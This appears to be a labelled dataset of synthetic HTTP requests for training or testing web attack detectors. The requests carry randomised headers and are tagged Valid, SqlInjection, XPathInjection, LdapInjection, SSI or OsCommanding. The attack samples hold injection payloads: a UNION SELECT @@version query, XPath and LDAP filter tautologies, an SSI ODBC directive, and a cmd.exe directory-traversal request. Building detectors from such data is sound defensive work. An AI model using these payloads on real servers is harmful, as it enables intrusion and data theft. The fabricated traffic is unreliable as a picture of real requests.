Cookie: deoeeiao1=10449147;isstiqo=qWnlieubpMQurI;pfnhg=su5tw$eUe@tmpartiriira;dnseerxetftGp2n=mRzc;rCb@taK6tconnectFZ=ckmOzVgFB;wehr7nu3ipGkze=a5ds4erw
Cookie2: $Version="51"
Date: Tue, 25 Nov 08 10:56:47 GMT
ETag: W/".t0JuD5cq2VPleKzw14m"
Expect: 100-continue
From: mFutck@dAkrnce.ch
If-Modified-Since: Fri, 06 Nov 09 16:03:26 CET
If-Unmodified-Since: Fri, 16 Jul 04 05:41:09 CET
If-Match: *
If-None-Match: "5kDv0rQ.iX.XzReIZ"
If-Range: Tue, 27 Apr 10 17:19:35 CET
Max-Forwards: 04
MIME-Version: 2.9
Pragma: 0nm=oeis
Proxy-Authorization: Basic VXphczpoaHJvaWV0dA==
Authorization: Basic c0lsb2k6bmVoN1M=
Range: 243506-,-6953
Referer: /hhAref/54edus/brygoen.cfm
TE: trailers
Trailer: Accept-Language
User-Agent: ycog4Yit/4.9.9.3.6
UA-CPU: 68000
UA-Disp: 909,493,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 483x5740
Via: HTTP/3.6 215.48.95.196, 2.0 18.141.23.108, FTP/7.9 60.96.253.88
Transfer-Encoding: gzip
Upgrade: wpO/2.1, hmsoz/8.8
Warning: 045 169.228.86.134:3 "angeeriohb" 
X-Forwarded-For: 252.136.126.236
X-Serial-Number: 3296146
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27719
Start - Id: 48669
class: XPathInjection
PUT /i46AJ4ozelJ91KhF-fC/yau_H3vyA0C/me5v1ictcbnleeeo/0M0daYtKkVG@5H7ZShJ/p5IN39txewscMscoaIg/TEuuiduarenA2nanOe/z40s-.88/o6AOC4b0p9HmzyDQM-/oLs/eOP7Y5P4JyeT.QvA5Gxt/lSbXmbb.tiff? HTTP/1.0
Content-Length: 235
Content-Language: 3demzgta,obtgrg,pEcena
Content-Encoding: gzip
Content-Location: /tak11ntr/pcerOkF/ntu1/Ldqsdhr.tar.gz
Content-MD5: dGllZ2V0UXNocmdlN2luag==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Dec 04 22:52:15 CET
Last-Modified: Wed, 14 Dec 05 16:26:41 CET
Host: 55.34.14.175
Connection: keep-alive
Accept: audio/basic, application/postscript, image/*
Accept-Charset: iso-8859-6, koi8, x-mac-arabic;q=0.6, x-mac-arabic, windows-1255
Accept-Encoding: 
Accept-Language: wep-cnwmolpw, hw-Mdx, nte-9ieTCe, cngmso-esv;q=0.7, 4halyx-nE;q=0.0
Cache-Control: only-if-cached
Client-ip: 94.68.181.174
Cookie: safeenaii=85801;no4qt=032984;1ojoyp='8;0at4ae=]eelL>eMaac;snh5ou=tLCN3r8wM
Cookie2: $Version="97"
Date: Wed, 13 Aug 08 10:15:52 GMT
ETag: W/"rOBiqjbhOHqjJpd"
Expect: 4Dsu
From: e32rlse@ib5bceaa.org
If-Modified-Since: Thu, 13 Oct 05 23:37:38 GMT
If-Unmodified-Since: Fri, 29 Jun 07 23:44:19 CET
If-Match: *
If-None-Match: *
If-Range: "Dq@hqaIle13M7L2QGj@-"
Max-Forwards: 62
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic dHNlbTppbWhz
Authorization: ugdnw pugF=iytalt
Range: 12-
Referer: http://ettdoc.uk/itks/h7rg/TSed/swui6yy.nsf
TE: gzip,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.4 (Windows; U; Windows NT 9.0; 3n-ii; rv:5.8.1) Gecko/47537163
UA-CPU: x86
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: rntAb/1.1 64.89.98.90:3081
Transfer-Encoding: gzip
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 456 136.21.126.138:79216 "9ErN6ntiDgwn" 
X-Forwarded-For: 105.28.18.229
X-Serial-Number: 9550547356245150782
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

ypeccndoHnZfz=cathems&yQeskbo5h=56610984&vyNeabtazg=3nzsmIp&bjik7nizehih=73437863&-PfHN=078    or     1<  tanh3T/rlm4ra/hrTl/child::text()[position()=670]    or    1988='] | /* | /foo[bar='

End - Id: 48669
Start - Id: 25145
class: Valid
GET /Oefseudrsrmtrsr9/Ndfn55ch.cgi?ahaimarrWF=19834923&GcaH01uw=577636321&t674haen39=0HtmIXbpe_qq&ieE=4250&Slo=niyna7ntolt8de0gt&a8k=8046&nh8yEaenee=a-YfxQcLGL&eYn-=hai7oexceh1ts&D5Kyb=e5ehhRtcwetIonh&jS1HxxjfM=cconnecte-srroauuqz&1U80=sX3.i_u&rao=tmaccepta&pweazseievs8ai=6934387340&ewnwucHrcnwbw0=tdnD HTTP/1.0
Host: www.ms9oAmCea.ch:24
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-15, x-mac-korean
Accept-Encoding: deflate;q=0.5, deflate;q=0.9, compress;q=0.1
Accept-Language: e-rt;q=0.7, d-ew;q=0.8
Cache-Control: min-fresh=448
Client-ip: 32.228.225.57
Cookie: aTbnph7pXes=1915;kdiaLart=39710;varBevalW385=uoie;BqZSi=3
Cookie2: $Version="537"
Date: Tue, 20 Jan 04 13:56:01 GMT
ETag: W/"Ve.@D6zZ4Y6MV36UG"
Expect: peup
From: eMfiaeeO@ftisitrql.fr
If-Modified-Since: Fri, 06 Aug 04 10:58:31 CET
If-Unmodified-Since: Thu, 28 Apr 05 02:37:56 GMT
If-Match: "jFtle6ug98cD1VEuK_r"
If-None-Match: *
If-Range: "vnbUe0TUxaTQLzc5"
Max-Forwards: 2176
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: NTLM b3JkdHBhMWFvaGVsYXRFZWUzMG9pajlpc25vaTl0YW5udW4=
Authorization: Digest realm
Range: -7771,422958-
Referer: /beaa/nfzo/idyHS9/aalsnr/uteo.doc
TE: trailers,gzip;q=0.1,chunked;q=0.4
Trailer: If-None-Match
User-Agent: udY-Q2oE http://www.elGsa.net
UA-CPU: Sparc
UA-Disp: 037,012,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5457x802
Via: 2.3 www.s6iltniy.png, HTTP/3.7 www.nhcVariO.jpeg
Transfer-Encoding: deflate
Upgrade: oulp3p/8.2
Warning: 667 www.ecitwrb.jpg "hagkslkdeoiEwoaeL" "Sun, 08 Aug 04 11:38:20 GMT"
X-Forwarded-For: 31.113.199.2
X-Serial-Number: 3897200999
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 25145
Start - Id: 30322
class: Valid
GET /9VgIwXMN8gyUpK/ccUH6dE/ais1acttrdino.exe?t4cAmp=Ebbcp3Iefoentek&Ret=oodssto&toe6jqfh=lxr&8Yjtu9e=1h+51tFjmncm HTTP/1.0
Host: 123.159.98.127
Connection: dpiiftom
Accept: application/*, video/mpeg, text/xml;q=0.6
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.5
Accept-Language: uAea-i, e-aE5s6, hnnnlo-no, oQrdRase-spa;q=0.8, eb5honwn-Jhdf
Cache-Control: no-transform
Client-ip: 219.179.134.227
Cookie: d81eqatnA=swutGea0owd3pww;ublhv=cesfuti;t9adaa=54940915;1ltulrdi1a=7741356
Cookie2: $Version="1"
Date: Sun, 11 Jan 04 17:05:41 GMT
ETag: W/"uaTGlGF-qbMung2oH"
Expect: tgt4
From: eredri@rnloehihom.net
If-Modified-Since: Sun, 08 Nov 09 07:46:18 CET
If-Unmodified-Since: Mon, 13 Feb 06 04:25:28 UTC
If-Match: "2TNoZ_VX93PUmncWFC"
If-None-Match: "e@MP@PGjPE5-ZsZAEO"
If-Range: Mon, 02 Jan 06 03:58:44 CET
Max-Forwards: 5823
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic ZXJ0SWN5YjU6aFRuNHRu
Authorization: Digest qop=auth-int
Range: 3-440226,69-6
Referer: http://www.iatabT.st/2zJd/enHdcisH/3twboroa.nsf
TE: trailers
Trailer: Connection
User-Agent: Mozilla/8.4 (Windows; U; Win98 0.7; en-Ra; rv:6.6.5) Gecko/32777339
UA-CPU: 68000
UA-Disp: 2673,3726,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3971x442
Via: HTTP/7.3 27.231.7.167
Transfer-Encoding: netl
Upgrade: iure/4.9
Warning: 232 99.201.159.8 "oAqfnetTzahmyttdf" "Fri, 04 Jul 08 05:10:09 UTC"
X-Forwarded-For: 209.241.65.202
X-Serial-Number: 60742
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30322
Start - Id: 14594
class: Valid
GET /n8knneye/hii6atanxohneTaTfAzl/oPsuWBmsD@PZ-2ki9R7l/FmJFKopassthrurHypaF/Aa3HY/F3b/5pneede7gsO9tn/lpHMfwf@jCi/Gh7/1MOuwp-Sz3WYunionPqexec8/AY426W9.pl?EMd0a1HeeDr=1Gr4FSI33a&ftToansoOtgll=9n_pV0027o&toQhyEjsdEij=q3vbscript HTTP/1.0
Host: 35.37.97.141
Connection: rcx7agie
Accept: audio/*, image/*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=768
Client-ip: 24.117.75.187
Cookie: eegraGEx8e=3<os'aA;heghpLanti=h/aaLlibrri;ElocationFperlfmcatY=72
Cookie2: $Version="92"
Date: Thu, 03 Sep 09 14:46:40 UTC
ETag: W/"DNOFhk2ID6lpyIpyzX"
Expect: dlTbar=ansn;rdqia
From: es2ntogi@en5eitt1.de
If-Modified-Since: Thu, 05 Jun 08 09:53:07 CET
If-Unmodified-Since: Sun, 06 Jan 08 20:32:06 UTC
If-Match: *
If-None-Match: "QZVHf70Mhe_7M0yfwO"
If-Range: *
Max-Forwards: 623
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: H5bm be3dbise=tmssi
Authorization: Digest cnonce="lzez3Cna"
Range: 45-4785,-21867,70176-3030
Referer: http://tqewnxha.cz/pzkn/rergoui.sh
TE: trailers,trailers
Trailer: User-Agent
User-Agent: fxXmvSCa http://www.rsgt0.gov
UA-CPU: Sparc
UA-Disp: 1652,237,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0214x748
Via: me2/6.8 www.ohoth.png, 3.6 www.hnsnysdq.jpg, 5.2 104.189.212.183:162
Transfer-Encoding: gzip
Upgrade: aAup/3.4, wlhsoh/9.7, nbao/4.6
Warning: 070 www.7a8dwsii.html "svtOooelCswy" "Tue, 02 Mar 10 22:43:31 CET"
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 12480
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14594
Start - Id: 38591
class: LdapInjection
GET /eiao/vhseodqaomshpiut6ttE/avhnCOS1XLG5C.cgi?lEnIntocndp=bhtivh&tocmhw=+2s&R2sw=2&vrfkIywae4dipw3=jnn%29&sead3eENoeo=7677591900&rotnnLisozsu=ghia%26ni++gw&feraCwoeabr=873%29%28%26%28objectClass%3D11Et%29%28%7C%28sn++%3D+++me9a%29%28cn%3Da6++++J*%29%29&N7xoAR3lib=rEnseTi-uc&tqaa=eprza&Ct6V1DslL=%24+thnr%28-h&Fstadlhoorttnw2=S7&dfihbsrnesi=7452670&leey=ee5l HTTP/1.0
Host: 88.189.32.192
Connection: close
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sqnfst-6e2emtsh, lioemnh-Wt4ret;q=0.7
Cache-Control: no-cache
Client-ip: 165.158.133.130
Cookie: Yvc-TLZIz7M_=9271523073;vbse1onda=dNgvMI;dpashssiiti=gsVq1wPelmfX;itx=ifhttpseo
Cookie2: $Version="61"
Date: Sun, 22 May 05 20:25:31 CET
ETag: "-JtG7_R7TXsAf9DYaiP"
Expect: 100-continue
From: Henr0sl4@nexht.fr
If-Modified-Since: Fri, 03 Aug 07 24:12:39 GMT
If-Unmodified-Since: Thu, 15 Jan 04 11:46:10 GMT
If-Match: *
If-None-Match: *
If-Range: "sxv3v.j2cwm90IEEQv"
Max-Forwards: 588
MIME-Version: 9.6
Pragma: uPedkas='aatan4di'
Proxy-Authorization: Digest cnonce="0Nnzylmx"
Authorization: Digest opaque="rseh"
Range: -348176
Referer: /nsnhFknu/kAsoiosa.wmn
TE: trailers,gzip;q=0.3
Trailer: If-Range
User-Agent: e5x_avp http://www.7opspwN.it
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2971x6869
Via: FTP/2.3 209.176.240.142
Transfer-Encoding: compress
Upgrade: teh/3.7, eErn/1.4, yrgp42/8.0, 3Ets/1.6
Warning: 494 www.yte1Tn.shtml "iewe" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 379109696738614
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38591
Start - Id: 35830
class: XPathInjection
GET /oeZ-KZcJx/ix/tL96p_74d.eAegkb/Ewp-k/phtacces1QN/exxkN3/thwQsy6/e51lKzS9H@SgJ-Rg.gif?vcsos=laYthU&axiehtwls04i=4ms8at&ypoianavuS=%40group+bytpasswdaa&aeet=+u&aeznttvAtrhp=942&rg=kyse3c&dzpioaomyettbd=2&ecaazosue4oQrh=nrBIe81sosonhtr&0F2PUePqoqq=elreHeedDair1sen&mar=to3elriO&dxteqm04u=an&cerhueb9dnrH=eu8zAi&Hn2HxRqjb3O=2265043&NSin2cd=%28i++++%3C++++count%28mvhr%2Fchild%3A%3Atext%28%29%29+++and++++j++++%3C++++count%2835e%2Fchild%3A%3Acomment%28%29%29+and+k++++%3C++count%28rbeet%2Fchild%3A%3A*%29++%29 HTTP/1.1
Host: 247.232.182.167
Connection: keep-alive
Accept: video/mpeg;q=0.8, audio/x-wav;q=0.9
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, compress;q=0.8, gzip, compress;q=0.6
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 48.181.108.67
Cookie: 6thiu=asozUlh;nzwt=8331;wpiframem9No=694
Cookie2: $Version="38"
Date: Mon, 02 Feb 09 16:20:41 GMT
ETag: W/"lpsbtCm1cdq5sF5ek"
Expect: 100-continue
From: ruo94ns@yteerTrl.it
If-Modified-Since: Fri, 16 May 08 13:29:10 CET
If-Unmodified-Since: Thu, 30 Apr 09 14:55:09 UTC
If-Match: *
If-None-Match: *
If-Range: "OmzeiO7ZYkR6-EF1_t-"
Max-Forwards: 7
MIME-Version: 0.9
Pragma: eldfpwdt='zgkkEt'
Proxy-Authorization: Digest nonce
Authorization: NTLM bGplUmlzMkU5QWhzdGVjc2lkczBmb2Vjb1VqdHFhc1MwZW5wdA==
Range: 77-,-9
Referer: http://etsio.de/fdnjhhiv/loeacl/2iBcho9/rrwi.cfm
TE: chunked,deflate;q=0.7
Trailer: Host
User-Agent: iati4eTacmtaa5rni
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: oCo/8.6 www.9eSnasaf.css:6
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 198 www.toldzft.js "aieysaloeRmyhanfuas" "Wed, 06 Aug 08 03:23:52 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 62972291005
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35830
Start - Id: 49389
class: XPathInjection
GET /nalwn/4BmzQv_X6and/dlS7@Yall_N.shtml?ohiteISieeHuh=0+++or++++6de%2Fo%2Far%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D1%5D+or+++505%3D&GyA5hFQ=6ofeUenaeXtd&rztdezl5wtas=ojiniti5o&SZqzKeugP=abcd0adnull&2r5LFushcoiq=pNdrIinsertcselectservices0me&eegorpt8xbtsc=oe&ceakp=lysceItr%2Bac&sA16B=aseechouoctphh7t&yn0RLBkKSXwI=Fuse&JirpEyTc8scriptvA=bodytobject1aareclz%3Bitftpe+&rnecn=989963866&yH=550&taemx5Ehd3rth=401000 HTTP/1.0
Host: 135.254.128.79
Connection: leinLrem
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, identity, gzip, identity;q=0.2, identity;q=0.9
Accept-Language: *
Cache-Control: max-age=80893
Client-ip: 60.131.206.78
Cookie: aylxyMNlE=ehurugc
Cookie2: $Version="1"
Date: Sat, 07 Oct 06 12:44:54 GMT
ETag: W/"2TMjTj3nMjRhbDH037L"
Expect: iploeea=erto
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Mon, 26 Apr 10 01:23:44 GMT
If-Unmodified-Since: Mon, 06 Nov 06 21:28:57 UTC
If-Match: *
If-None-Match: "D@ujWRWMXaAHoPFg"
If-Range: Fri, 02 Jan 09 21:09:50 CET
Max-Forwards: 091
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: Basic aWQ0ZTpuZG9mcm5u
Range: -33311,24-
Referer: http://rvrr4wi8.be/nraust.cgi
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Range
User-Agent: Mozilla/9.0 (Windows; U; Win98 3.0; Ed-9g; rv:4.8.2) Gecko/18999720
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0695x2392
Via: ddmay/0.9 202.230.117.190, fxhks/4.5 www.esheh.jpeg, FTP/3.4 66.182.78.167
Transfer-Encoding: rr9Hr
Upgrade: titdOa/5.1
Warning: 873 179.220.247.176 "a53nepbizi" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 9327975536472
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49389
Start - Id: 26612
class: Valid
GET /efnadl/mLJaW/i-pOMjCtc-Cc/c1wU3qM79opkBDA/3P.html?foYig=20911239&h7Cd=flwindow.openaxL&dbberso=8866&mtdab=whpOhaanwo%24r&b8cofcRa5n=%2BF%26ra0r3h%3ArRrhttps%2Fselectn&ecsrA=%25feirloori3aezhh&iLwf=iqsye&JtTs9=s0%7C%40rs&ea7Asa=wtqrl&7oouHaka9lva2ha=c70nn&oeaorOdeyi7y7=702453 HTTP/1.0
Host: 15.229.179.79:80
Connection: eele
Accept: application/postscript;q=0.6, text/*;q=0.3, text/xml
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: n8='i1acke'
Client-ip: 60.195.247.35
Cookie: xtssageashaiydA=46052976;Elhl=Ou5eglgTaouToue;neoaansi=herhdrtpuloet iframeautoexecw
Cookie2: $Version="901"
Date: Tue, 15 Feb 05 17:02:10 GMT
ETag: W/"ET8PB8@zCmfVZdsF8cA"
Expect: tntonh
From: ceebh8z@anOtt1nhog.cz
If-Modified-Since: Fri, 14 Mar 08 09:46:49 UTC
If-Unmodified-Since: Mon, 01 Oct 07 09:38:04 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Jun 06 24:11:17 CET
Max-Forwards: 143
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic ZWFzcmZUczY6YmlkaXc=
Authorization: Basic aXJ3aGE6cmxuM2xhc2k=
Range: 3-,788456-3,6670-026581
Referer: http://iaxn.st/j3dpjaln/a3tyyrR.htm
TE: chunked;q=0.7
Trailer: Referer
User-Agent: Mozilla/2.0 (X11; U; Linux i386 1.9; rt-ta; rv:8.4.5) Gecko/03137985
UA-CPU: Sparc
UA-Disp: 3286,345,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 190x433
Via: FTP/9.1 www.eggi8.shtml, eon/9.6 164.207.33.134, apb/3.8 www.teuhIa.jpeg
Transfer-Encoding: deflate
Upgrade: m8nn/6.2, dh8taa/7.5, 0vmmct/2.3, onl/6.9
Warning: 472 51.16.225.72 "ie2nQuyerrj" 
X-Forwarded-For: 227.175.6.41
X-Serial-Number: 21651458708939157204
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 26612
Start - Id: 27630
class: Valid
GET /nMD-bOVp1/q9GgV3mOPB1@mailu/nRv4M/NqautoexecpassthrurAtYBVMct/kwzdpvueenod/ENT2T.jpeg?TH1=1876&hs=67&hgalhht=+&tlt=uuf%7Ceakn%7Eswce%28&hueen=wa+&s-lOXzitmpwpd=duerdropl93fh&57C1gWE7gry=+uR&4qeu24-MB=qgroup+bynae&7reD=2aeoardderrmsAit&soshna=519920&gooiqol=ragohD&KFAlski0Jt-=730987032&2eschK=39705&rswlfrstiiaMioh=%27+60odnfoga9%28koptQ&nOadCeo=Qta%28 HTTP/1.1
Host: 241.192.225.29
Connection: h4gheqi
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 202.3.25.123
Cookie: tmOhcisTlea=9398971411;tn6voo3aeRiE=t5JfX-D3OIJd;joTea5=srto8isvbscriptjkeu]net
Cookie2: $Version="0"
Date: Tue, 25 May 04 09:15:08 CET
ETag: W/"Q7FDirU-IyamM8-k"
Expect: seop=r3jomss
From: 06wy8l@mtedC.de
If-Modified-Since: Mon, 03 May 10 05:01:17 UTC
If-Unmodified-Since: Sat, 31 Mar 07 13:03:59 GMT
If-Match: "1jsuZdoQptlVQzKN"
If-None-Match: "i35xzCX_hcq-upr"
If-Range: "Z3Ng8MUr27t9k1L3EW"
Max-Forwards: 9
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic WG5pYVc6YWljaGk=
Authorization: fcNq 7es5=ertjoie
Range: 719-500,-5,-47
Referer: /e6cnoaS/goueSw.jpeg
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: ethUsterwsaedtgtl
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 794x6621
Via: oe9/3.5 161.154.202.163
Transfer-Encoding: szoti
Upgrade: die/3.4, 3oT7t/0.8
Warning: 907 95.3.6.240 "U0ssne4rnc" "Mon, 23 Jan 06 20:28:05 GMT"
X-Forwarded-For: 207.7.25.237
X-Serial-Number: 189697977036477
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27630
Start - Id: 42435
class: SqlInjection
GET /Oarhsd/eCGE/xK/5EW_m3ESpUgtYU/rmmiasl9Wrifx/dec5wqaj/aBG2-cSOEKn2XmV/enksiX3nlhn8yrl/DRxbuselectbi6xq.msf?dk=7007271&t5emruoi=514366&st8sot8tntai=tineeee&aaatl3xwtsdm=ohs&6ReItG1wboeh6=90&6rREcbtojEsser=i5-gs&iOeottiDIhdgt=368024&wr=%27+union+++select++%40%40version%2C1%2C1%2C1--&opoTph=iiee&3heaowe4vnaoo=nmutp&mts5h=coE%3Ft HTTP/1.1
Host: www.fjwweisrf.gov:43
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: aua=thi7whli
Client-ip: 34.227.190.70
Cookie: .ghtaccesloK=024687350
Cookie2: $Version="2"
Date: Tue, 08 May 07 14:47:18 UTC
ETag: "ZSerFm.z9rWfs9@A7MH."
Expect: ctja
From: ein6@dloaflHo.biz
If-Modified-Since: Fri, 07 Apr 06 17:21:38 GMT
If-Unmodified-Since: Sun, 08 Nov 09 16:46:32 UTC
If-Match: "GkOAUG4fFCndLOMzL"
If-None-Match: *
If-Range: Thu, 12 Oct 06 12:44:22 UTC
Max-Forwards: 57
MIME-Version: 0.6
Pragma: leomi='oihlabna'
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: Basic ZXllaVRoczY6bHNvM2k=
Range: 53-,-2932
Referer: /st5w/ttiDhalr/qe690i/xz6tolsd/ysist.gz
TE: deflate;q=0.8
Trailer: If-None-Match
User-Agent: e7wee/7.1
UA-CPU: PowerPC
UA-Disp: 257,8628,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: 5.1 www.foetac.png, HTTP/6.6 109.95.108.194:0308
Transfer-Encoding: deflate
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 292 www.ev6O.jpeg "hnt5llemsftyrettr" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42435
Start - Id: 40951
class: SSI
PUT /cTmWKJWrcLLUq/0broqe/rY5kWFIsd.K/RpQPstdind/7HlnqanR@YCI9tD/iP8h-sSUxZ/HfNDFRyT/aeTse/eai8icOeneios/eLIz5f5NZQRPES2MRrIQ.aspx? HTTP/1.1
Content-Length: 241
Content-Language: eighhr,a,cmTdHi
Content-Encoding: compress
Content-Location: http://in3Enr.net/etidw/taeev.dll
Content-MD5: ZWVzY2U1bGxyZW5zNnRpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Jan 10 01:27:48 GMT
Host: 149.194.197.140
Connection: roIbl
Accept: text/*;q=0.7
Accept-Charset: iso-8859-1, windows-1258;q=0.6, windows-1253
Accept-Encoding: gzip;q=0.5
Accept-Language: <!--    #odbc  statement =  "select ialoejc, pczje,     tinoiiet from     emmKs    order by    4,   25,  0"     -->
Cache-Control: no-transform
Client-ip: 60.165.102.233
Cookie: Eit=r;lexecEC6RoT=4449987;Z3Uaccept.kT=eoe8=tbiae;eIxsgeentoncu=cloelfta4n0sascr0i;nhnsKt9Dead=%p
Date: Sat, 07 Aug 04 07:13:23 CET
ETag: "TZdlLIRNQWGRcEJSmW9M"
Expect: 6rheoiee
If-Modified-Since: Sun, 10 Dec 06 12:38:41 UTC
If-Match: "Xhah-ihvrXnL4LP"
If-None-Match: "GDeEfG.BgkennETRUR"
Pragma: ilon8='s2ox'
Proxy-Authorization: iektl tpahs=r1lxfd
Authorization: Basic ZUVwZEFobDppYnBnZA==
Range: 966916-888
Referer: /rdbeA2ll/a59m0nOr.cfm
User-Agent: n12ttn (ujTT2QB.; t7VoAaWa0C; n.WX@BZun)
UA-Disp: 6856,2269,16
Via: 2.3 8.164.198.116, et6i/9.4 www.ttsddh.shtml
----: ------------------------------

oi=meit&2orTid4iiEehcH=eun&L8YJOechoqbC8=14&ttskrpfctu=-td-w&qnwcegiAs=941&bpEs4tTbeKscmr=]0+/u&objectJkOGg4Od=81157&itey=41427&Nktccetnq=988&TsrbrirneeE=900539&Lja=5441321&ayil9or7u=6382116&f2=u ixml8&delirEedlmngpfh=soal&Asodintvab=5

End - Id: 40951
Start - Id: 44466
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 128.139.255.239
Connection: lrOe0
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 1.111.16.222
Cookie: rmsta=5386057;iet=jvoqsa
Cookie2: $Version="3"
Date: Mon, 22 Dec 08 06:46:05 UTC
ETag: "9tG0dVXV9Y0RyLYk3AXZ"
Expect: jsde5on
From: bniw@mamjmaT.net
If-Modified-Since: Fri, 18 Feb 05 13:12:12 UTC
If-Unmodified-Since: Thu, 28 Oct 04 01:11:51 CET
If-Match: *
If-None-Match: "@0agL0twbZzBoki6N88p"
If-Range: Mon, 09 Nov 09 19:43:14 CET
Max-Forwards: 2
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Basic cjNydDpzeHZlYXdzcQ==
Range: 6-02287,72753-
Referer: http://oietsdi.be/oanhS0n9/raEn.conf
TE: trailers
Trailer: Accept-Language
User-Agent: qioohnemt (nnMNs3; fYiaabtH7Y; 1KKDSLBG; y6TENdRLAi; eHmce0P)
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: HTTP/7.0 229.21.102.43, o1lt8A/8.7 www.R9sre.jpg, 5.4 www.aviaki.js:75
Transfer-Encoding: compress
Upgrade: arpaj/4.2, l8tsI/0.9, 9dev/6.0, m7u/6.0, sin/4.9
Warning: 500 103.24.153.176 "urwer2tml4" 
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44466
Start - Id: 49747
class: XPathInjection
GET /nqdeotrfh/chYIYHDvA-8aiMZnV/I8.bin?dbFNnVX=opI40g80T&Uennge=+ta8&BCLd=8699713294&KTuxtbt=ecnmt&sfd=4618962&otmrtn3uteid=7&d9hmcucEooili=e%40&ogscup=usrdn&sdgmesrjheni=%3Ee&5nimo8krat=srebnbgsoundaokoa%3Bpb&mrt=7&8Eant=6system%40hhtk0scripthQ5&s3ackbiws=29944&k6Xw1=48&tBwhereupdateG7S=5bnkiBgO%27++or++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28+++i+++%2B+++j+%2Bk++++%2B+++l++%2B+++1%29%5D+%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++%273o%27++%3D+%27+n8i%27++++or HTTP/1.1
Host: www.nelriyspio.de
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-greek, x-mac-ce, iso-2022-kr;q=0.2
Accept-Encoding: 
Accept-Language: obBaIadS-ceaBhilF, l9tcusyi-dcneu;q=0.8, ov7uaona-luott;q=0.3, tqa-C;q=0.4, hried-monhd
Cache-Control: only-if-cached
Client-ip: 24.134.122.55
